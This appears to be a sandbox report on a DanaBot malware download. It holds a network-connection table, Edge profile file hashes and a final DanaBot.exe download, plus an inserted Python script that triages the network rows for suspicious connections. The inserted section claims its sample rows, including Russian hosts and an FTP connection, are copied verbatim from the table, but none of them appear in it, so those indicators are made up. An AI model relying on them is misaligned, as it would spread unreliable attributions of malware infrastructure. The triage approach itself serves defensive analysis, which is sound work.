US 8.8.8.8:53 googleads.g.doubleclick.net udp
GB 142.250.179.226:443 googleads.g.doubleclick.net udp
GB 142.250.179.226:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 ep1.adtrafficquality.google udp
US 8.8.8.8:53 ep1.adtrafficquality.google udp
US 8.8.8.8:53 ep1.adtrafficquality.google udp
GB 172.217.169.34:443 ep1.adtrafficquality.google tcp
US 8.8.8.8:53 tpc.googlesyndication.com udp
US 8.8.8.8:53 tpc.googlesyndication.com udp
US 8.8.8.8:53 ads.eu.criteo.com udp
US 8.8.8.8:53 ads.eu.criteo.com udp
US 8.8.8.8:53 rtb.fr3.eu.criteo.com udp
US 8.8.8.8:53 rtb.fr3.eu.criteo.com udp
GB 172.217.16.225:443 tpc.googlesyndication.com tcp
GB 172.217.16.225:443 tpc.googlesyndication.com tcp
NL 178.250.1.17:443 ads.eu.criteo.com tcp
NL 178.250.1.17:443 ads.eu.criteo.com tcp
NL 178.250.1.17:443 ads.eu.criteo.com tcp
FR 178.250.7.12:443 rtb.fr3.eu.criteo.com tcp
FR 178.250.7.12:443 rtb.fr3.eu.criteo.com tcp
US 8.8.8.8:53 ads.eu.criteo.com udp
US 8.8.8.8:53 ads.eu.criteo.com udp
US 8.8.8.8:53 tpc.googlesyndication.com udp
US 8.8.8.8:53 tpc.googlesyndication.com udp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
US 8.8.8.8:53 ep2.adtrafficquality.google udp
US 8.8.8.8:53 ep2.adtrafficquality.google udp
US 8.8.8.8:53 ep2.adtrafficquality.google udp
US 8.8.8.8:53 ep2.adtrafficquality.google udp
US 8.8.8.8:53 ads.eu.criteo.com udp
US 8.8.8.8:53 ads.eu.criteo.com udp
US 8.8.8.8:53 static.criteo.net udp
US 8.8.8.8:53 static.criteo.net udp
US 8.8.8.8:53 cat.nl3.eu.criteo.com udp
US 8.8.8.8:53 cat.nl3.eu.criteo.com udp
US 8.8.8.8:53 measurement-api.criteo.com udp
US 8.8.8.8:53 measurement-api.criteo.com udp
GB 142.250.180.1:443 ep2.adtrafficquality.google tcp
NL 178.250.1.17:443 ads.eu.criteo.com tcp
US 8.8.8.8:53 cdnjs.cloudflare.com udp
US 8.8.8.8:53 cdnjs.cloudflare.com udp
NL 178.250.1.6:443 cat.nl3.eu.criteo.com tcp
NL 178.250.1.39:443 static.criteo.net tcp
NL 178.250.1.39:443 static.criteo.net tcp
NL 178.250.1.39:443 static.criteo.net tcp
NL 178.250.1.39:443 static.criteo.net tcp
NL 178.250.1.24:443 measurement-api.criteo.com tcp
US 104.17.24.14:443 cdnjs.cloudflare.com udp
US 8.8.8.8:53 csm.eu.criteo.net udp
US 8.8.8.8:53 csm.eu.criteo.net udp
NL 178.250.1.39:443 static.criteo.net tcp
NL 178.250.1.39:443 static.criteo.net tcp
US 8.8.8.8:53 imageproxy.eu.criteo.net udp
US 8.8.8.8:53 imageproxy.eu.criteo.net udp
NL 178.250.1.6:443 cat.nl3.eu.criteo.com tcp
NL 178.250.1.15:443 imageproxy.eu.criteo.net tcp
NL 178.250.1.15:443 imageproxy.eu.criteo.net tcp
NL 178.250.1.15:443 imageproxy.eu.criteo.net tcp
NL 178.250.1.15:443 imageproxy.eu.criteo.net tcp
NL 178.250.1.25:443 csm.eu.criteo.net tcp
US 8.8.8.8:53 rtb.fr3.eu.criteo.com udp
US 8.8.8.8:53 rtb.fr3.eu.criteo.com udp
NL 178.250.1.15:443 imageproxy.eu.criteo.net tcp
NL 178.250.1.15:443 imageproxy.eu.criteo.net tcp
NL 178.250.1.25:443 csm.eu.criteo.net tcp
US 8.8.8.8:53 ep2.adtrafficquality.google udp
US 8.8.8.8:53 ep2.adtrafficquality.google udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.180.4:443 www.google.com udp
GB 142.250.180.1:443 ep2.adtrafficquality.google tcp
NL 178.250.1.39:443 static.criteo.net tcp
US 8.8.8.8:53 csm.eu.criteo.net udp
US 8.8.8.8:53 csm.eu.criteo.net udp
US 8.8.8.8:53 ep2.adtrafficquality.google udp
US 8.8.8.8:53 ep2.adtrafficquality.google udp
GB 142.250.180.1:443 ep2.adtrafficquality.google udp
US 8.8.8.8:53 ep1.adtrafficquality.google udp
US 8.8.8.8:53 ep1.adtrafficquality.google udp
GB 216.58.204.66:443 ep1.adtrafficquality.google udp
FR 51.77.7.204:443 tcp
FR 51.77.7.204:443 tcp
US 8.8.8.8:53 csm.eu.criteo.net udp
US 8.8.8.8:53 csm.eu.criteo.net udp
US 8.8.8.8:53 www.dll-files.com udp
US 8.8.8.8:53 www.dll-files.com udp
US 8.8.8.8:53 csm.eu.criteo.net udp
US 8.8.8.8:53 csm.eu.criteo.net udp
US 8.8.8.8:53 maxcdn.bootstrapcdn.com udp
US 8.8.8.8:53 maxcdn.bootstrapcdn.com udp
US 8.8.8.8:53 ajax.googleapis.com udp
US 8.8.8.8:53 ajax.googleapis.com udp
GB 172.217.169.42:443 ajax.googleapis.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 ads.eu.criteo.com udp
US 8.8.8.8:53 ads.eu.criteo.com udp
US 8.8.8.8:53 rtb.fr3.eu.criteo.com udp
US 8.8.8.8:53 rtb.fr3.eu.criteo.com udp
US 8.8.8.8:53 cat.nl3.eu.criteo.com udp
US 8.8.8.8:53 cat.nl3.eu.criteo.com udp
US 8.8.8.8:53 measurement-api.criteo.com udp
US 8.8.8.8:53 measurement-api.criteo.com udp
US 8.8.8.8:53 client-side-metrics.eu.criteo.net udp
US 8.8.8.8:53 imageproxy.eu.criteo.net udp
US 8.8.8.8:53 imageproxy.eu.criteo.net udp
NL 178.250.1.54:443 client-side-metrics.eu.criteo.net tcp
US 8.8.8.8:53 csm.eu.criteo.net udp
US 8.8.8.8:53 csm.eu.criteo.net udp
US 8.8.8.8:53 ep1.adtrafficquality.google udp
US 8.8.8.8:53 ep1.adtrafficquality.google udp
GB 216.58.213.2:443 ep1.adtrafficquality.google udp
US 8.8.8.8:53 client-side-metrics.eu.criteo.net udp
US 8.8.8.8:53 client-side-metrics.eu.criteo.net udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 region1.analytics.google.com udp
US 8.8.8.8:53 region1.analytics.google.com udp
US 216.239.32.36:443 region1.analytics.google.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 www.dll-files.com udp
US 8.8.8.8:53 www.dll-files.com udp
US 8.8.8.8:53 rtb.fr3.eu.criteo.com udp
US 8.8.8.8:53 rtb.fr3.eu.criteo.com udp
US 8.8.8.8:53 imageproxy.eu.criteo.net udp
US 8.8.8.8:53 imageproxy.eu.criteo.net udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 csm.eu.criteo.net udp
US 8.8.8.8:53 csm.eu.criteo.net udp
US 8.8.8.8:53 client-side-metrics.eu.criteo.net udp
US 8.8.8.8:53 client-side-metrics.eu.criteo.net udp
US 8.8.8.8:53 maxcdn.bootstrapcdn.com udp
US 8.8.8.8:53 maxcdn.bootstrapcdn.com udp
NL 178.250.1.54:443 client-side-metrics.eu.criteo.net tcp
US 8.8.8.8:53 ajax.googleapis.com udp
NL 178.250.1.54:443 client-side-metrics.eu.criteo.net tcp
US 8.8.8.8:53 maxcdn.bootstrapcdn.com udp
US 8.8.8.8:53 maxcdn.bootstrapcdn.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 connect.facebook.net udp
US 8.8.8.8:53 connect.facebook.net udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 163.70.147.23:443 connect.facebook.net udp
GB 163.70.147.23:443 connect.facebook.net udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.180.4:443 www.google.com udp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 www.facebook.com udp
IE 31.13.73.35:443 www.facebook.com udp
IE 31.13.73.35:443 www.facebook.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.28.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
US 104.18.11.207:443 maxcdn.bootstrapcdn.com udp
GB 216.58.201.98:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
GB 142.250.179.226:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 ads.eu.criteo.com udp
US 8.8.8.8:53 ads.eu.criteo.com udp
FR 178.250.7.12:443 rtb.fr3.eu.criteo.com tcp
NL 178.250.1.17:443 ads.eu.criteo.com tcp
NL 178.250.1.17:443 ads.eu.criteo.com tcp
NL 178.250.1.17:443 ads.eu.criteo.com tcp
US 8.8.8.8:53 cat.nl3.eu.criteo.com udp
US 8.8.8.8:53 cat.nl3.eu.criteo.com udp
US 8.8.8.8:53 measurement-api.criteo.com udp
US 8.8.8.8:53 measurement-api.criteo.com udp
NL 178.250.1.6:443 cat.nl3.eu.criteo.com tcp
NL 178.250.1.24:443 measurement-api.criteo.com tcp
NL 178.250.1.25:443 csm.eu.criteo.net tcp
NL 178.250.1.15:443 imageproxy.eu.criteo.net tcp
GB 142.250.180.4:443 www.google.com udp
US 8.8.8.8:53 download.zip.dll-files.com udp
FR 143.244.56.58:443 download.zip.dll-files.com tcp
FR 143.244.56.58:443 download.zip.dll-files.com tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
IT 2.18.255.68:443 www.bing.com udp
IT 2.18.255.68:443 www.bing.com tcp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 th.bing.com udp
IT 2.18.255.93:443 r.bing.com udp
IT 2.18.255.93:443 r.bing.com udp
IT 2.18.255.115:443 th.bing.com udp
IT 2.18.255.115:443 th.bing.com udp
US 8.8.8.8:53 login.microsoftonline.com udp
US 8.8.8.8:53 login.microsoftonline.com udp
CA 69.50.175.178:80 tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
GB 2.18.27.82:443 www.bing.com tcp
CA 69.50.175.178:80 tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
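The Network table above mixes three kinds of rows: resolver queries (every `8.8.8.8:53 … udp` line records a name being looked up, not a connection), the Edge browser's own background traffic (Bing, Microsoft, Google, Criteo, Facebook), and the handful of rows that actually matter for this sample: the raw.githubusercontent.com fetch, taskhostw.com resolved to a Russian host on cleartext port 80, an FTP connection to 109.248.203.81:21 and two further direct-to-IP connections with no hostname, and the dll-files.com downloads. The script below, an added example for this page and not part of the original report, separates those classes and flags the rows an analyst should read first. SAMPLE_ROWS is a subset of the table copied verbatim; the browser-noise suffix list is an assumption about what a fresh Edge profile contacts on its own during a detonation, not something the report asserts.

```python
"""Triage of the sandbox 'Network' table: strip DNS-resolver noise and the
browser's own background traffic, keep the rows worth a second look.

Added example for this page, not part of the original report.  SAMPLE_ROWS is
a subset of the table rows, copied verbatim.  BROWSER_NOISE_SUFFIXES is an
assumption (what Edge contacts on its own), not something the report states."""
import ipaddress

# Constructed sample: a subset of the rows in the report's Network table.
SAMPLE_ROWS = """\
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 taskhostw.com udp
RU 152.89.218.85:80 taskhostw.com tcp
US 8.8.8.8:53 api.github.com udp
IE 23.216.155.139:443 th.bing.com udp
RU 109.248.203.81:21 tcp
NL 40.126.32.74:443 login.microsoftonline.com tcp
GB 79.127.237.132:443 www.dll-files.com tcp
FR 51.77.7.204:443 tcp
FR 143.244.56.58:443 download.zip.dll-files.com tcp
CA 69.50.175.178:80 tcp
US 150.171.27.11:443 edge.microsoft.com tcp
"""

# Assumption: background hosts a fresh Edge profile talks to on its own.
BROWSER_NOISE_SUFFIXES = (
    "bing.com", "microsoft.com", "microsoftonline.com", "google.com",
    "google.co.uk", "googleapis.com", "googleusercontent.com",
    "doubleclick.net", "googlesyndication.com", "adtrafficquality.google",
    "criteo.com", "criteo.net", "facebook.com", "facebook.net",
    "bootstrapcdn.com", "cloudflare.com",
)


def parse_row(line):
    """'CC ip:port [host] proto' -> dict; the host column may be absent."""
    parts = line.split()
    if len(parts) == 4:
        cc, endpoint, host, proto = parts
    elif len(parts) == 3:
        (cc, endpoint, proto), host = parts, ""
    else:
        raise ValueError(f"unexpected row: {line!r}")
    ip, port = endpoint.rsplit(":", 1)
    ipaddress.ip_address(ip)            # reject anything that is not an address
    return {"cc": cc, "ip": ip, "port": int(port), "host": host, "proto": proto}


def is_dns_lookup(row):
    return row["port"] == 53 and row["proto"] == "udp"


def is_browser_noise(row):
    host = row["host"]
    return bool(host) and any(
        host == s or host.endswith("." + s) for s in BROWSER_NOISE_SUFFIXES)


def triage(text):
    """Return (names looked up, de-duplicated connections, [(row, reasons)])."""
    looked_up, connections, suspicious, seen = set(), [], [], set()
    for line in text.splitlines():
        if not line.strip():
            continue
        row = parse_row(line)
        if is_dns_lookup(row):
            looked_up.add(row["host"])      # a query, not a connection
            continue
        key = (row["ip"], row["port"], row["host"], row["proto"])
        if key in seen:
            continue                        # the table repeats endpoints
        seen.add(key)
        connections.append(row)
        reasons = []
        if not row["host"]:
            reasons.append("no hostname (direct-to-IP)")
        if row["port"] not in (80, 443):
            reasons.append(f"unusual port {row['port']}")
        if row["port"] == 80:
            reasons.append("cleartext HTTP")
        if row["host"] and not is_browser_noise(row):
            reasons.append("not in browser-noise allowlist")
        if reasons:
            suspicious.append((row, reasons))
    return looked_up, connections, suspicious


if __name__ == "__main__":
    names, conns, flagged = triage(SAMPLE_ROWS)
    print(f"{len(names)} names resolved, {len(conns)} unique connections, {len(flagged)} flagged")
    for row, why in flagged:
        print(f"  {row['cc']} {row['ip']}:{row['port']} {row['host'] or '-':35} {', '.join(why)}")
```

On the sample the script keeps 10 unique connections and flags 7 of them; login.microsoftonline.com, th.bing.com (the `udp` rows on port 443 are QUIC, still connections) and edge.microsoft.com drop out as browser noise. A name that is resolved but never connected to (api.github.com in the sample) is itself worth noting, which is why lookups are returned separately instead of discarded.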

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6eac9d05429a9358b608d44d94784e10
SHA1 73395ed98fee0a7a2f8585c37a8811bd8837585d
SHA256 0bf0ae5a65a11d2714b2ac12a424cd38ed0a8b7e7530ec59362786b1a832eb60
SHA512 235731c2c6a85f6ada201f4e4c061ce7db201a2e82c04334a5bfcbfdba60f9ac1b99a06e9ac1e9bbea1651b16747fa4e44f68f6882a960671b6b613f51213c18

\??\pipe\crashpad_4936_KJZHPWNWOOTLXDJW

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 a7bd3d5922ae81414e7944b805a7d35a
SHA1 e46d09db68c10c1fa46f3e38f65ab8263bcebc5c
SHA256 bf1e815460636c7eedf53bcf4ce784779c762d894954dc17c5fd6cec76a13695
SHA512 d14a13dddf68d10b0f593ae574e8e80c53e62ca6cf873c730ae34c87a434c1caa74bfa0ce8789ab050beabfa80d323c5dad416cc28c7fb169f9e664f1c2ce030

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 cf1d30ca2332aa18881b260bba9417f1
SHA1 a8dc7686399154740a107526f533f6ecdb071137
SHA256 5fb81b7f6083c821a5f8e1e3ff9783dd3d808bb5a7edcac8ad94441a6c101824
SHA512 c6c07d6593dd645640165a5e76b7662d5af298f9a3781c44950b9bf330cb4f58d0939624625148c3bd90e13acf563f6c55091e27ed7f55ffe31545f2ca1b3d9b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 3913928d36a204b8c7a09f9664615308
SHA1 6f5a2afcf7d4f9ba5d201c4575ee7ea5cbc904bc
SHA256 5cd63a20006de4c006a47a6b3a922a53b15bda4fbfd14e77b8a5416583c8f9b9
SHA512 25f2410c171fb2c64bd4a3706a3a3b5de6f694cbebe555cc223996fd3a16d346737594d4cc09a737484d8a5e3a0ea33e0705ac60481b51857bdb3127a7996145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

MD5 164a788f50529fc93a6077e50675c617
SHA1 c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48
SHA256 b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17
SHA512 ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

MD5 9909f25844a1ac13b891bf462008cc5a
SHA1 62a89cf9811ec7836d31ae1cfcadeea40d449262
SHA256 30f323427ba600b0f21e8688973f0521d909ae20004238a4b37a8af67892af88
SHA512 abb2b081701327aef555d5ece7d883473bb604ac92e6d94986f26d12a348a35ff9c2d06de93aa746b6f7ed3fa6ced66366882c73172315c2e7503cd82c40d782

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

MD5 a025da0ebcf89247ff9b629cf9102d84
SHA1 6edb404e1e926439e927c76de4797fa4e39100b3
SHA256 6a987bcb93b542e404cdb5996a911a818e3ac3c9fcd9fa5e0903a16f137bc21e
SHA512 9880b122b449fcf43609991ba8bfe0c1acb271a654d20ebb9e59ed96e11efd89ae034acd939c49e0fbb798a41195282e56f5cc1e6387362de0deb863f242499a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Temp\scoped_dir4936_847988428\6eeca731-58f6-454b-b9a0-9b69c3cd474f.tmp

MD5 cc05ed3e66468e692745ba6563c69740
SHA1 eae9dbd4d36aa91fd43f7d452ac3d252b103759d
SHA256 fb1311fb7142825abacb3c7aedddf948f5c9b258e447c953ce0f7f4b19c6dfff
SHA512 4b527db02d6ea36b914558a3e44fd3d15772bf2be4ba0a640bf70427af07dcde5ed6967930cc3624a244cfc82290f125eea2754812586216b3d5a37757ce8db4

C:\Users\Admin\AppData\Local\Temp\090c6243-2cb7-4625-badf-088de9eebab7.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Temp\76624c06-9455-46b1-831c-65bc5339ed29.tmp

MD5 78e47dda17341bed7be45dccfd89ac87
SHA1 1afde30e46997452d11e4a2adbbf35cce7a1404f
SHA256 67d161098be68cd24febc0c7b48f515f199dda72f20ae3bbb97fcf2542bb0550
SHA512 9574a66d3756540479dc955c4057144283e09cae11ce11ebce801053bb48e536e67dc823b91895a9e3ee8d3cb27c065d5e9030c39a26cbf3f201348385b418a5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

MD5 06d55006c2dec078a94558b85ae01aef
SHA1 6a9b33e794b38153f67d433b30ac2a7cf66761e6
SHA256 088bb586f79dd99c5311d14e1560bbe0bb56225a1b4432727d2183341c762bcd
SHA512 ec190652af9c213ccbb823e69c21d769c64e3b9bae27bea97503c352163bf70f93c67cebbf327bfc73bfd632c9a3ae57283b6e4019af04750fe18a2410a68e60

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist

MD5 d11d7533c72bb4f2e791d05650a45e2e
SHA1 eb1383e1d99a1c78ce2721fee15043eb7d498f63
SHA256 3d7124bd67434b44501704e52f34ba05d545541b01335cf5fbbcefde11703ba5
SHA512 52188a97e95b96b4ae1c219baead33cd56b84ebc82131fbb7312c379d4d847944491f42e17def5a22351796c1f4eadcbe66455162207c888eb93e7fdb1b46d71

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_1\content.js

MD5 3d20584f7f6c8eac79e17cca4207fb79
SHA1 3c16dcc27ae52431c8cdd92fbaab0341524d3092
SHA256 0d40a5153cb66b5bde64906ca3ae750494098f68ad0b4d091256939eea243643
SHA512 315d1b4cc2e70c72d7eb7d51e0f304f6e64ac13ae301fd2e46d585243a6c936b2ad35a0964745d291ae9b317c316a29760b9b9782c88cc6a68599db531f87d59

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 c5e635cdb0e61c5e4c7203669f195a68
SHA1 04eb8119bae584e6802f3d269f17000b86ed4f19
SHA256 11ccb733e7f7238fd2d95c4e15f8c409923975fa18e24cd37aa4428b7830fbe4
SHA512 534d14b0354566128f5ce1c16a2168975273ccea36420fe4816b7ae9b48d13e1852995aed68b2e534430079f69fa1098c864727c6801067213c2e07b7f342453

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 65e997c55db45b534d70d9024d14def1
SHA1 0962b3269c79e1d2e647cfac3e11f195f233ce38
SHA256 9d65e4ad5d0b08bc3ddd38588e0e16565b94938f3c8584391f2464dffdfa9f0f
SHA512 38bf81e0bab3a25f4a7eb01d309e6691ae9a0df507c633dc94305103d369733bfc1546abee7a0d3324104c96e9e86cd954d230b5aa97c61844422e013ac410f6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 84614b13d358af20a58da2b2e90b671e
SHA1 b3ccb056457d2c2bf7639372dbcecd5e5b9f29e0
SHA256 72e1fe9dc4e6990cfd9636823254eba771fcaa03d35a1c53d20c9427cf5bece1
SHA512 b8b29b202bf68e8b1a1b97d2e7c11497eeaa46401998eb9fb09f074a2b144234ea9d4f9692c8d1abe09cde06b71c475cdf88ac5e7858d69955d5508f9bd79d49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\863b841d-5c10-44d3-99ed-2b9af6f19ec0\index-dir\the-real-index~RFe578c13.TMP

MD5 acc0238398e33ea10f4ba5cc651860b9
SHA1 1cbdcd9511c38d8e1b4ba5972a71d6ed15ab749e
SHA256 1a40b8594e30215b08ba2f1b597130f1a7f405b36977bdea732609e127c94416
SHA512 dd6836e8b76494027f20d02c5ddc2135c86eca379fa0fd0c939cd4dfc8736c51fc5031628b2cdab7fb673cd210391a5c3d36a304635ab6be597422ba41401686

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\863b841d-5c10-44d3-99ed-2b9af6f19ec0\index-dir\the-real-index

MD5 bf3bba0d5b278b7276367a6acd394ce6
SHA1 74ce01e356fc234decf50b358cf1a8c5b7ae6865
SHA256 b94292449f57a5d2250e3d9b11748bdb946a6b89847a5a2daa392667babe57ec
SHA512 47b9d67b907d574e7aa982a9500a15ddd6cd934e087543fe15f0b58a6e6b1bca201fd8edd3774954c5bce4915395de356d72fd38c4698dc7bf1f8c4d2648cef4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 aa09337019e09f44c09d1951e82f26d8
SHA1 38bd6301adfe6e248d3570a43e78be875b0493ca
SHA256 222dc494fa24b738863ab79c9db5a9901c721ab802c9a88ea45c59fc0c2b8468
SHA512 148f614ebdb9cb4a307e7dd2ae445ae44414b078e027f10faf37900d1787b5ca652de2559f5985ccb0609aff66cb22ca6182fb9dddc0e1b6934a353e35d1d034

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter~RFe57d4e4.TMP

MD5 ea05c6b44fbc6cef0216798e455c60a2
SHA1 9ef3efbd93cb53f324c31a76563f7c0e1abeb747
SHA256 f5ba5e1582687fc1da53257a2be9ecda811061bffe5d41e02233e118bc43ac47
SHA512 0a96cde7e8ba6434c54c9ce20771beb2173422c29cc440d11fb6c3a907793a9d147dbcc3ff9a240c2adfcf87355c3d96f012576f5bd8c301702cdfa88142a844

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7ae766bc26dd294f838e6edb5b5c9e36
SHA1 de0fd07fa49709c762129db80b80d0cd449d3971
SHA256 79d06c6f75c3309c8d2ad55715036adb0f5b06a05597294056b197211c60c9ae
SHA512 059caf08068c5c9f8b5891d0dec005de9671070be5fe93e408723f002a4935663af36370a350802b77936ea069623eb7cc3bc4d9a748330f6bf22fde8d0b0816

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 50637954d77a6b8865002d1d51400e92
SHA1 206fa223982c7997251b73b2cab11fa6061fe660
SHA256 3443afc6c1a126e6b45dc09fdce216a904ac7d3e943ff3c3499a633c3c3f9f3d
SHA512 eabb0e21c75232b037fcbd4c955c2f3ef32f56c12762bec3679d2d42c37851c4acb7abb1621f3cd123b8ffc2972c7f46fc1c26b31d63f3e512246d7640eb0736

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 959cdfac1874528cd68b35debbb7485a
SHA1 83755fe2f3c62fe30befb7d89848fae96ac37603
SHA256 2d01e9835055b72ee8919adde14f63f95c0ccf6ae2447682983dc7c761fcdf41
SHA512 9e69fbd4966628126dcfe80dd280ae315ccc04c2c99a550a58b692cf7ceeb3cd135c8f6e439edee9b3e6fa01f649e1070466adece7b124156fbe7c19c55d2b6d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57f405.TMP

MD5 0137cc8c41ef78d807f6630dd8f5c300
SHA1 66fdfa830bdd3b437952dd81c790cfbeafee06ba
SHA256 233369a3112a51adebaf09aca3a51008834db4481c94abe942aa299ecffd8e15
SHA512 b77023f204e2c5d04009f0fe7a165931a6febbe13160c8bb1f55ac4445e95237f4e5000dceb05dae9c4c2bafb2cd06bdde5219271571eb33ffa95f3555854d93

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

MD5 edd31b43bb3abe8c9328e7534e8fd296
SHA1 af216e4dad381810af7a7c5ff15672411abca4aa
SHA256 2f4cb9c6afbb59393ec9b73b91c4c2bae396297b54be27419b73b03661d1d4a6
SHA512 736e270387e75cc7c1db40c4b22e96afd04e41d99d463f51415de6a3d40ec8c0a60e3b50231973da0f9540a8ecd5909e115e9cd899a6eef0110f7454bdd1d6c1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries~RFe57fdd8.TMP

MD5 20d4b8fa017a12a108c87f540836e250
SHA1 1ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA256 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

C:\Users\Admin\Downloads\DanaBot.exe.crdownload

